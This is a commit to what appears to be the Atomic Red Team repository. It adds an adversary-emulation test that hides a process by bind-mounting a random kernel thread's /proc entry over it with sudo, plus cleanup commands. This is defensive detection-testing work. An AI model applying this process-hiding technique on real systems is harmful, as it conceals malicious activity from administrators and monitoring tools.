Update T1036.004.yaml (#2945)

* Update T1036.004.yaml * Update T1036.004.yaml Added elevation_required and set the value to true * Update atomics/T1036.004/T1036.004.yaml Co-authored-by: Hare Sudhan <[email protected]> --------- Co-authored-by: Hare Sudhan <[email protected]>
redcanaryco · Sep 24, 2024 · 95856cc · 95856cc
1 parent 48887f4
commit 95856cc
Showing 1 changed file with 17 additions and 0 deletions.
diff --git a/atomics/T1036.004/T1036.004.yaml b/atomics/T1036.004/T1036.004.yaml
@@ -55,3 +55,20 @@ atomic_tests:
       exit 0
     cleanup_command: |
       rm -f #{exe_path}
+- name: Hiding a malicious process with bind mounts
+  description: |
+    Creates a malicious process and hides it by bind mounting to the /proc filesystem of a benign process
+  supported_platforms:
+  - linux
+  executor:
+    elevation_required: true
+    command: |
+      eval '(while true; do :; done) &'
+      echo $! > /tmp/evil_pid.txt
+      random_kernel_pid=$(ps -ef | grep "\[.*\]" | awk '{print $2}' | shuf -n 1)
+      sudo mount -B /proc/$random_kernel_pid /proc/$(cat /tmp/evil_pid.txt)
+    cleanup_command: |
+      kill $(cat /tmp/evil_pid.txt) || echo "Failed to kill PID $evil_pid"
+      rm /tmp/evil_pid.txt
+    name: sh
+